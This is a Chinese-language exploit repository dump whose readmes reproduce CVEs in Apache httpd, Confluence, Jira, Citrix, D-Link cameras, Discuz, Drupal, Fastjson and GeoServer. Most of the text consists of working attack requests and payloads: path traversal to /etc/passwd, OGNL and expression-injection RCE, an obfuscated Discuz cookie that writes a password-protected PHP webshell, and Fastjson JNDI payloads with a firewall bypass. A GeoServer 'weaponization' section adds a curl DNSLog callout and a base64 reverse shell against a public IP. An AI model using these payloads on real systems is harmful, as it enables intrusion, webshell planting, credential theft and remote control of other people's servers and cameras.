在kali下搭建的漏洞环境run多次后一直失败,经查看发现kali下的java版本是openjdk version "11.0.6" 2020-01-14,怀疑可能是java版本过高导致的利用失败,故在ubuntu16.04_x64_en-us下使用java8重新搭建solr-8.2.0.zip,漏洞利用成功。看过别人在java10下也有利用成功的文章,怀疑可能exp针对java10及以下的版本才有效。 33 | 坑2: 34 | centos7下默认开启防火墙,需要临时关闭防火墙:“systemctl stop firewalld” 35 | 36 | # 0x06 参考链接 37 | https://github.com/jas502n/CVE-2019-12409 38 | -------------------------------------------------------------------------------- /Apache/Apache Spark远程命令执行漏洞(暂无编号)/Exploit.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Apache/Apache Spark远程命令执行漏洞(暂无编号)/Exploit.jar -------------------------------------------------------------------------------- /Apache/Apache Spark远程命令执行漏洞(暂无编号)/pic/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Apache/Apache Spark远程命令执行漏洞(暂无编号)/pic/1.png -------------------------------------------------------------------------------- /Apache/Apache Spark远程命令执行漏洞(暂无编号)/pic/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Apache/Apache httpd路径遍历及RCE漏洞(CVE-2021-41773)/pic/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Apache/Apache httpd路径遍历及RCE漏洞(CVE-2021-41773)/pic/1.png -------------------------------------------------------------------------------- /Apache/Apache httpd路径遍历及RCE漏洞(CVE-2021-41773)/pic/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Apache/Apache httpd路径遍历及RCE漏洞(CVE-2021-41773)/pic/2.png -------------------------------------------------------------------------------- /Apache/Apache httpd路径遍历及RCE漏洞(CVE-2021-41773)/pic/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Apache/Apache httpd路径遍历及RCE漏洞(CVE-2021-41773)/readme.md: -------------------------------------------------------------------------------- 1 | 参考链接: 2 | https://github.com/blasty/CVE-2021-41773 3 | https://zh-cn.tenable.com/blog/cve-2021-41773-path-traversal-zero-day-in-apache-http-server-exploited?tns_redirect=true 4 | 5 | ### 注意 6 | 仅影响版本2.4.49及“require all denied”指令未开启(默认情况下此指令不开启) 7 | 8 | 9 | ### 环境搭建 10 | 1、下载docker环境配置文件:https://github.com/blasty/CVE-2021-41773/archive/refs/heads/master.zip 11 | 2、解压后执行:docker-compose build && docker-compose up 12 | 3、访问宿主机8080端口:http://127.0.0.1:8080 13 | 14 | ### 漏洞利用 15 | 1、文件读取payload 16 | ``` 17 | /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 18 | ``` 19 | 如下图 20 | ![image](./pic/1.png) 21 | 2、RCE payload 22 | ``` 23 | /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh 24 | ``` 25 | 并添加body 26 | ``` 27 | echo Content-Type: text/plain; echo; id 28 | ``` 29 | 如下图 30 | ![image](./pic/2.png) 31 | -------------------------------------------------------------------------------- /Atlassian/Atlassian Confluence远程代码执行漏洞(CVE-2021-26084)/pic/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Atlassian/Atlassian Confluence远程代码执行漏洞(CVE-2021-26084)/pic/1.png -------------------------------------------------------------------------------- /Atlassian/Atlassian Confluence远程代码执行漏洞(CVE-2021-26084)/pic/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Atlassian/Atlassian Confluence远程代码执行漏洞(CVE-2021-26084)/readme.md: -------------------------------------------------------------------------------- 1 | OGNL表达式注入导致的远程代码执行漏洞 2 | 3 | # 1、影响版本 4 | version < 6.13.23 5 | 6.14.0 ≤ version < 7.4.11 6 | 7.5.0 ≤ version < 7.11.6 7 | 7.12.0 ≤ version < 7.12.5 8 | 9 | # 2、漏洞复现 10 | burp下发送如下请求 11 | ``` 12 | POST /pages/doenterpagevariables.action HTTP/1.1 13 | Host: xx.xx.xx.xx:8090 14 | Connection: keep-alive 15 | Content-Length: 599 16 | Cache-Control: max-age=0 17 | sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Google Chrome";v="92" 18 | sec-ch-ua-mobile: ?0 19 | Upgrade-Insecure-Requests: 1 20 | Content-Type: application/x-www-form-urlencoded 21 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 22 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,i mage/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 23 | Sec-Fetch-Site: same-origin 24 | Sec-Fetch-Mode: navigate 25 | Sec-Fetch-User: ?1 26 | Sec-Fetch-Dest: document 27 | Accept-Encoding: gzip, deflate, br 28 | Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 29 | Cookie: JSESSIONID=3E654B6F4ADDF325CA2203596BD0115C 30 | cmd: perl --version 31 | 32 | queryString=%5Cu0027%2B%23%7B%5Cu0022%5Cu0022%5B%5Cu0022class%5Cu0022%5D.forName%28%5Cu0022javax.script.ScriptEngineManager%5Cu0022%29.newInstance%28%29.getEngineByName%28%5Cu0022js%5Cu0022%29.eval%28%5Cu0022var+c%3Dcom.atlassian.core.filters.ServletContextThreadLocal.getRequest%28%29.getHeader%28%5Cu0027cmd%5Cu0027%29%3Bvar+x%3Djava.lang.Runtime.getRuntime%28%29.exec%28c%29%3Bvar+out%3Dcom.atlassian.core.filters.ServletContextThreadLocal.getResponse%28%29.getOutputStream%28%29%3Borg.apache.commons.io.IOUtils.copy%28x.getInputStream%28%29%2Cout%29%3Bout.flush%28%29%3B%5Cu0022%29%7D%2B%5Cu0027 33 | ``` 34 | 如下图 35 | ![image](./pic/1.png) 36 | -------------------------------------------------------------------------------- /Atlassian/Atlassian Jira POC/Unauthenticated_JIRA_CVEs_to_Exploit.txt: -------------------------------------------------------------------------------- 1 | CVE-2019-3402 (XSS) 2 | 1. Navigate to /secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search 3 | 2. Observe that the payload is getting executed. 4 | 5 | CVE-2019-3396 (Path Traversal) 6 | 1. Try Below POST Request with the JIRA Target 7 | 2. POST /rest/tinymce/1/macro/preview HTTP/1.1 Host: {{Hostname}} Accept: */* Accept-Language: en-US,en;q=0.5 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Referer: {{Hostname}} Content-Length: 168 Connection: close {"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"Page Not Found - Viddler}}} 8 | 9 | CVE-2019-11581 (Template Injection) 10 | 1. Navigate to /secure/ContactAdministrators!default.jspa 11 | 2. Try the SSTI Payloads 12 | 13 | CVE-2020-14179 (Information Disclosure) 14 | 1. Navigate to /secure/QueryComponent!Default.jspa 15 | 2. It leaks information about custom fields, custom SLA, etc. 16 | 17 | CVE-2020-14178 (Project Key Enumeration) 18 | 1. Navigate to /browse. 19 | 2. Observe the error message on valid vs. invalid project key. Apart from the Enumeration, you can often get unauthenticated access to the project if the protections are not in place. 20 | 21 | CVE-2020-14181 (User Enumeration) 22 | 1. Navigate to /secure/ViewUserHover.jspa?username= 23 | 2. Observe the response when valid vs. invalid username is provided. 24 | 25 | CVE-2019-3403 (User Enumeration) 26 | 1. Navigate to /rest/api/2/user/picker?query= 27 | 2. Observe the difference in response when valid vs. invalid user is queried. 28 | 29 | CVE-2019-8442 (Sensitive Information Disclosure) 30 | 1. Navigate to /s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml 31 | 2. Observe that the pom.xml file is accessible. 32 | 33 | CVE-2019-8449 (User Information Disclosure) 34 | 1. Navigate to /rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true 35 | 2. Observe that the user related information will be available. 36 | CVE-2019-8451 (SSRF) 37 | 1. Navigate to /plugins/servlet/gadgets/makeRequest?url=https://:1337@example.com 38 | 39 | CVE-2018-20824 (XSS) 40 | 1. Navigate to /plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain) 41 | 2. Observe that the payload will be executed. 42 | 43 | CVE-2017-9506 (SSRF) 44 | Navigate to 1. /plugins/servlet/oauth/users/icon-uri?consumerUri= 45 | 46 | CVE-2019-8451 (SSRF) 47 | 1. Navigate to /plugins/servlet/gadgets/makeRequest?url=https://:1337@example.com 48 | -------------------------------------------------------------------------------- /Atlassian/Atlassian Jira POC/Unauthenticated_JIRA_CVEs_to_Exploit.xmind: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Atlassian/Atlassian Jira POC/Unauthenticated_JIRA_CVEs_to_Exploit.xmind -------------------------------------------------------------------------------- /Atlassian/Atlassian Jira POC/readme.md: -------------------------------------------------------------------------------- 1 | Unauthenticated_JIRA_CVEs_to_Exploit.xmind:脑图文件 2 | Unauthenticated_JIRA_CVEs_to_Exploit.txt:从脑图中提取的文字 3 | -------------------------------------------------------------------------------- /Citrix/Citrix XenMobile目录遍历漏洞(CVE-2020-8209)/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Citrix/Citrix XenMobile目录遍历漏洞(CVE-2020-8209)/0.png -------------------------------------------------------------------------------- /Citrix/Citrix XenMobile目录遍历漏洞(CVE-2020-8209)/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Citrix/Citrix XenMobile目录遍历漏洞(CVE-2020-8209)/1.png -------------------------------------------------------------------------------- /Citrix/Citrix XenMobile目录遍历漏洞(CVE-2020-8209)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | XenMobile:Citrix Endpoint Management(也称为XenMobile)用于管理员工的移动设备和移动应用程序。通常,由于Active Directory集成,它部署在网络外围并可以访问内部网络。这使XenMobile成为安全研究的主要目标。 3 | 4 | # 0x01 复现环境 5 | 使用环境:本地搭建的环境 6 | 复现版本:无 7 | 8 | # 0x02 环境搭建 9 | 无 10 | 11 | # 0x03 利用条件 12 | 无 13 | 14 | # 0x04 影响版本 15 | Citrix XenMobile Server 10.12 before RP2 16 | Citrix XenMobile Server 10.11 before RP4 17 | Citrix XenMobile Server 10.10 before RP6 18 | Citrix XenMobile Server before 10.9 RP5 19 | 20 | # 0x05 漏洞复现 21 | 攻击环境:kali_x64_en-us 22 | 23 | 直接在ip后加如下路径 24 | ``` 25 | /jsp/help-sb-download.jsp?sbFileName=../../../../etc/passwd 26 | ``` 27 | 如 28 | ``` 29 | http://www.example.com/jsp/help-sb-download.jsp?sbFileName=../../../../etc/passwd 30 | ``` 31 | 如下图 32 | ![image](./0.png) 33 | ![image](./1.png) 34 | 35 | # 0x06 踩坑记录 36 | 无 37 | 38 | # 0x07 参考链接 39 | https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/ 40 | -------------------------------------------------------------------------------- /Citrix/Citrix远程代码执行漏洞(CVE-2019-19781)/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Citrix/Citrix远程代码执行漏洞(CVE-2019-19781)/0.png -------------------------------------------------------------------------------- /Citrix/Citrix远程代码执行漏洞(CVE-2019-19781)/CVE-2019-19781.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Citrix/Citrix远程代码执行漏洞(CVE-2019-19781)/CVE-2019-19781.zip -------------------------------------------------------------------------------- /Citrix/Citrix远程代码执行漏洞(CVE-2019-19781)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | Citrix:可以简单理解为从外网接入的公司的VPN设备,或网络出口的路由器设备等 3 | 4 | # 0x01 复现环境 5 | 使用环境:测试环境 6 | 复现版本:无 7 | 8 | # 0x02 环境搭建 9 | 无 10 | 11 | # 0x03 利用条件 12 | 无 13 | 14 | # 0x04 影响版本 15 | Citrix ADC and Citrix Gateway version 13.0 all supported builds before 13.0.47.24 16 | NetScaler ADC and NetScaler Gateway version 12.1 all supported builds before 12.1.55.18 17 | NetScaler ADC and NetScaler Gateway version 12.0 all supported builds before 12.0.63.13 18 | NetScaler ADC and NetScaler Gateway version 11.1 all supported builds before 11.1.63.15 19 | NetScaler ADC and NetScaler Gateway version 10.5 all supported builds before 10.5.70.12 20 | Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO all supported software release builds before 10.2.6b and 11.0.3b 21 | 22 | # 0x05 漏洞复现 23 | 攻击环境:kali_x64_en-us 24 | 25 | git clone https://github.com/projectzeroindia/CVE-2019-19781 26 | cd ./CVE-2019-19781 27 | bash CVE-2019-19781.sh x.x.x.x 'ls' 28 | 如下图 29 | ![image](./0.png) 30 | 31 | # 0x06 踩坑记录 32 | 无 33 | 34 | # 0x07 参考链接 35 | 无 36 | -------------------------------------------------------------------------------- /D-Link/D-Link DCS系列监控摄像机账号密码泄露漏洞(CVE-2020-25078)/pic/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/D-Link/D-Link DCS系列监控摄像机账号密码泄露漏洞(CVE-2020-25078)/pic/0.png -------------------------------------------------------------------------------- /D-Link/D-Link DCS系列监控摄像机账号密码泄露漏洞(CVE-2020-25078)/pic/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /D-Link/D-Link DCS系列监控摄像机账号密码泄露漏洞(CVE-2020-25078)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | D-Link DCS系列:D-Link是一家台湾科技公司,中文名:友讯科技,其旗下的DCS系列是畅销的网络摄像机 3 | 4 | # 0x01 复现环境 5 | 复现环境:本地环境 6 | 复现版本:None 7 | 环境搭建: 8 | 无 9 | 10 | # 0x02 利用条件 11 | 无 12 | 13 | # 0x03 影响版本 14 | DCS-2530L 15 | DCS-2670L 16 | DCS-4603 17 | DCS-4622 18 | 等多个DCS系列系统 19 | 20 | # 0x04 漏洞复现 21 | 添加URL:/config/getuser?index=0 22 | 即访问[http://xxx.xxx.xxx.xxx/config/getuser?index=0](http://xxx.xxx.xxx.xxx/config/getuser?index=0)会泄露账号和密码 23 | 24 | 使用账号密码登陆后即可查看摄像头的监控画面 25 | ![image](./pic/0.png) 26 | 27 | # 0x05 批量脚本 28 | 无 29 | 30 | # 0x06 参考链接 31 | https://mp.weixin.qq.com/s/b7jyA5sylkDNauQbwZKvBg 32 | -------------------------------------------------------------------------------- /Discuz/Discuz 7.x 6.x全局变量防御绕过导致远程代码执行漏洞(暂无编号)/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Discuz/Discuz 7.x 6.x全局变量防御绕过导致远程代码执行漏洞(暂无编号)/0.png -------------------------------------------------------------------------------- /Discuz/Discuz 7.x 6.x全局变量防御绕过导致远程代码执行漏洞(暂无编号)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | Discuz:一款流行的论坛程序 3 | 4 | # 0x01 复现环境 5 | 使用环境:vulhub中的环境 6 | 复现版本:无 7 | 8 | # 0x02 环境搭建 9 | 靶机环境:2008_r2_standard_zh-chs 10 | 11 | 切换到对应目录下 12 | docker-compose up -d 13 | 启动后,访问[http://172.16.35.128:8080/install/](http://172.16.35.128:8080/install/)来安装discuz,数据库地址填写db,数据库名为discuz,数据库账号密码均为root 14 | 15 | # 0x03 利用条件 16 | 无 17 | 18 | # 0x04 影响版本 19 | Discuz 7.x 6.x 20 | 21 | # 0x05 漏洞复现 22 | 攻击环境:kali_x64_en-us 23 | 24 | 安装成功后,直接找一个已存在的帖子,向其发送数据包,将Cookie中的数据改为 25 | ``` 26 | GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo() 27 | ``` 28 | 请求如下 29 | ``` 30 | GET /viewthread.php?tid=13&extra=page%3D1 HTTP/1.1 31 | Host: 172.16.35.128:8080 32 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 33 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 34 | Accept-Language: en-US,en;q=0.5 35 | Accept-Encoding: gzip, deflate 36 | Referer: http://172.16.35.128:8080/forumdisplay.php?fid=2&page=1 37 | Connection: close 38 | Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo() 39 | Upgrade-Insecure-Requests: 1 40 | Pragma: no-cache 41 | Cache-Control: no-cache 42 | ``` 43 | 返回如下图 44 | ![image](./0.png) 45 | 46 | 想getshell可将Cookie中的内容变为 47 | ``` 48 | GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=eval(Chr(102).Chr(112).Chr(117).Chr(116).Chr(115).Chr(40).Chr(102).Chr(111).Chr(112).Chr(101).Chr(110).Chr(40).Chr(39).Chr(119).Chr(102).Chr(46).Chr(112).Chr(104).Chr(112).Chr(39).Chr(44).Chr(39).Chr(119).Chr(39).Chr(41).Chr(44).Chr(39).Chr(60).Chr(63).Chr(112).Chr(104).Chr(112).Chr(32).Chr(64).Chr(101).Chr(118).Chr(97).Chr(108).Chr(40).Chr(36).Chr(95).Chr(80).Chr(79).Chr(83).Chr(84).Chr(91).Chr(108).Chr(97).Chr(108).Chr(97).Chr(108).Chr(97).Chr(93).Chr(41).Chr(63).Chr(62).Chr(39).Chr(41).Chr(59)) 49 | ``` 50 | 发送的请求如下 51 | ``` 52 | GET /viewthread.php?tid=13&extra=page%3D1 HTTP/1.1 53 | Host: 172.16.35.128:8080 54 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 55 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 56 | Accept-Language: en-US,en;q=0.5 57 | Accept-Encoding: gzip, deflate 58 | Referer: http://172.16.35.128:8080/forumdisplay.php?fid=2&page=1 59 | Connection: close 60 | Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=eval(Chr(102).Chr(112).Chr(117).Chr(116).Chr(115).Chr(40).Chr(102).Chr(111).Chr(112).Chr(101).Chr(110).Chr(40).Chr(39).Chr(119).Chr(102).Chr(46).Chr(112).Chr(104).Chr(112).Chr(39).Chr(44).Chr(39).Chr(119).Chr(39).Chr(41).Chr(44).Chr(39).Chr(60).Chr(63).Chr(112).Chr(104).Chr(112).Chr(32).Chr(64).Chr(101).Chr(118).Chr(97).Chr(108).Chr(40).Chr(36).Chr(95).Chr(80).Chr(79).Chr(83).Chr(84).Chr(91).Chr(108).Chr(97).Chr(108).Chr(97).Chr(108).Chr(97).Chr(93).Chr(41).Chr(63).Chr(62).Chr(39).Chr(41).Chr(59)) 61 | Upgrade-Insecure-Requests: 1 62 | Pragma: no-cache 63 | Cache-Control: no-cache 64 | ``` 65 | 然后可使用蚁剑连接,地址http://172.16.35.128:8080/wf.php 密码lalala 66 | 67 | # 0x06 踩坑记录 68 | 无 69 | 70 | # 0x07 参考链接 71 | 无 72 | -------------------------------------------------------------------------------- /Drupal/Drupal远程代码执行漏洞(CVE-2018-7600)/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Drupal/Drupal远程代码执行漏洞(CVE-2018-7600)/0.png -------------------------------------------------------------------------------- /Drupal/Drupal远程代码执行漏洞(CVE-2018-7600)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 复现环境 2 | 使用复现环境:https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2018-7600 3 | 4 | # 0x01 利用条件 5 | 无 6 | 7 | # 0x02 影响版本 8 | 7.23<=7.x<=7.57 9 | 8.3.x<=8.3.8 10 | 8.4.x<=8.4.5 11 | 8.5.x<=8.5.0 12 | 13 | # 0x03 漏洞复现 14 | 执行“ruby ./drupalggedon2.rb http://172.16.35.128:8080” 15 | 会返回一个shell,可在返回的shell中执行命令,如下图 16 | ![image](./0.png) 17 | 18 | # 0x04 踩坑记录 19 | 坑1: 20 | 环境创建完之后,使用kali下的firefox访问127.0.0.1:8080时,burp不能抓到数据包,原因未知,解决方案:使用kali下的firefox访问局域网ip“172.16.35.128:8080” 21 | 坑2: 22 | 登录状态下使用vulhub中的poc无效,需要登出后才可执行命令id,vulhub中的poc如下: 23 | ``` 24 | POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1 25 | Host: your-ip:8080 26 | Accept-Encoding: gzip, deflate 27 | Accept: */* 28 | Accept-Language: en 29 | User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) 30 | Connection: close 31 | Content-Type: application/x-www-form-urlencoded 32 | Content-Length: 103 33 | 34 | form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id 35 | ``` 36 | 坑3: 37 | 使用vulhub中的poc执行命令“ls”,只能看到一个文件“web.config”,执行命令“ls -a /”也只能看到一个文件“var” 38 | 39 | # 参考链接 40 | https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2018-7600 41 | -------------------------------------------------------------------------------- /Fastjson/Fastjson漏洞集合.md: -------------------------------------------------------------------------------- 1 | ### 版本探测 2 | ```text 3 | {"@type":"java.lang.AutoCloseable" 4 | 5 | ["test":1] 6 | 7 | ["@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://qiyisrm.uustay.dns.yoyostay.top/exploit"] 8 | 9 | 参考链接: 10 | https://blog.csdn.net/weixin_43510203/article/details/115277081 11 | https://b1ue.cn/archives/402.html 12 | ``` 13 | 14 | ### 漏洞版本梳理 15 | ```text 16 | 自2017年,1.2.24版本,官方主动爆出反序列化漏洞后,安全研究员开始了fastjson漏洞之旅 17 | 官方也在1.2.24之后增加了AutoType限制 18 | 19 | Fastjson <= 1.2.47 20 | https://blog.csdn.net/weixin_39190897/article/details/107284989 21 | https://zeo.cool/2020/07/04/红队武器库!fastjson小于1.2.68全漏洞RCE利用exp/ 22 | 23 | Fastjson <= 1.2.68 24 | 自1.2.68起,增加了SafeMode模式 25 | 26 | Fastjson <= 1.2.80 27 | 在特定条件下可绕过AutoType限制,反序列化RCE 28 | 29 | 最新版1.2.83发布于2022年05月23日 30 | ``` 31 | 32 | ### 漏洞利用 33 | ```text 34 | demo 35 | {{"@type":"java.net.URL","val":"http://.dnslog.cn"}:0 36 | 37 | bypass长亭SafeLine 38 | {"@type":\b"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:9999","autoCommit":true}} 39 | ``` -------------------------------------------------------------------------------- /GeoServer/GeoServer CVE-2024-36401漏洞复现及武器化/GeoServer CVE-2024-36401漏洞复现及武器化.md: -------------------------------------------------------------------------------- 1 | # 0x01 漏洞复现 2 | ## POST 3 | ``` 4 | POST /geoserver/wfs HTTP/1.1 5 | Host: 39.98.250.47:8080 6 | Accept-Encoding: gzip, deflate, br 7 | Accept: */* 8 | Accept-Language: en-US;q=0.9,en;q=0.8 9 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36 10 | Connection: close 11 | Cache-Control: max-age=0 12 | Content-Type: application/xml 13 | Content-Length: 356 14 | 15 | 19 | 20 | exec(java.lang.Runtime.getRuntime(),'touch /tmp/success2') 21 | 22 | ``` 23 | ![image](./images/01.png) 24 | 25 | ## GET 26 | ``` 27 | GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'touch%20/tmp/success1') HTTP/1.1 28 | Host: 39.98.250.47:8080 29 | Accept-Encoding: gzip, deflate, br 30 | Accept: */* 31 | Accept-Language: en-US;q=0.9,en;q=0.8 32 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36 33 | Connection: close 34 | Cache-Control: max-age=0 35 | 36 | 37 | ``` 38 | ![image](./images/02.png) 39 | 40 | ## 结果 41 | 成功创建文件success1和success2 42 | ![image](./images/03.png) 43 | 值得注意的是,typeNames必须存在,我们可以在Web页面中找到当前服务器中的所有Types 44 | 45 | 46 | # 0x02 漏洞武器化 47 | ## POST 48 | ### DNSLog 49 | 50 | 需要注意ping pvip4zip.eyes.sh会报错,需要用curl pvip4zip.eyes.sh 51 | 52 | ``` 53 | POST /geoserver/wfs HTTP/1.1 54 | Host: 39.98.250.47:8080 55 | Accept-Encoding: gzip, deflate, br 56 | Accept: */* 57 | Accept-Language: en-US;q=0.9,en;q=0.8 58 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36 59 | Connection: close 60 | Cache-Control: max-age=0 61 | Content-Type: application/xml 62 | Content-Length: 358 63 | 64 | 68 | 69 | exec(java.lang.Runtime.getRuntime(),'curl pvip4zip.eyes.sh') 70 | 71 | ``` 72 | 成功收到dnslog记录 73 | ![image](./images/04.png) 74 | 75 | ### 反弹Shell 76 | 直接插入反弹shell的命令会提示请求解析失败 77 | ![image](./images/07.png) 78 | 79 | base64编码后,返回正常 80 | ![image](./images/06.png) 81 | 82 | 成功收到反弹shell 83 | ![image](./images/05.png) -------------------------------------------------------------------------------- /GeoServer/GeoServer CVE-2024-36401漏洞复现及武器化/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/GeoServer/GeoServer CVE-2024-36401漏洞复现及武器化/images/01.png -------------------------------------------------------------------------------- /GeoServer/GeoServer CVE-2024-36401漏洞复现及武器化/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/GeoServer/GeoServer CVE-2024-36401漏洞复现及武器化/images/02.png -------------------------------------------------------------------------------- /GeoServer/GeoServer CVE-2024-36401漏洞复现及武器化/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/GeoServer/GeoServer CVE-2024-36401漏洞复现及武器化/images/03.png -------------------------------------------------------------------------------- /GeoServer/GeoServer CVE-2024-36401漏洞复现及武器化/images/04.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/GeoServer/GeoServer CVE-2024-36401漏洞复现及武器化/images/04.png -------------------------------------------------------------------------------- /GeoServer/GeoServer CVE-2024-36401漏洞复现及武器化/images/05.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/GeoServer/GeoServer CVE-2024-36401漏洞复现及武器化/images/05.png -------------------------------------------------------------------------------- /GeoServer/GeoServer CVE-2024-36401漏洞复现及武器化/images/06.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/GeoServer/GeoServer CVE-2024-36401漏洞复现及武器化/images/06.png -------------------------------------------------------------------------------- /GeoServer/GeoServer CVE-2024-36401漏洞复现及武器化/images/07.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/GeoServer/GeoServer CVE-2024-36401漏洞复现及武器化/images/07.png -------------------------------------------------------------------------------- /Git/Git泄漏漏洞(暂无编号)/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Git/Git泄漏漏洞(暂无编号)/0.png -------------------------------------------------------------------------------- /Git/Git泄漏漏洞(暂无编号)/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Git/Git泄漏漏洞(暂无编号)/1.png -------------------------------------------------------------------------------- /Git/Git泄漏漏洞(暂无编号)/GitHack-master.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Git/Git泄漏漏洞(暂无编号)/GitHack-master.zip -------------------------------------------------------------------------------- /Git/Git泄漏漏洞(暂无编号)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | git:分布式版本控制系统 3 | 4 | # 0x01 复现环境 5 | 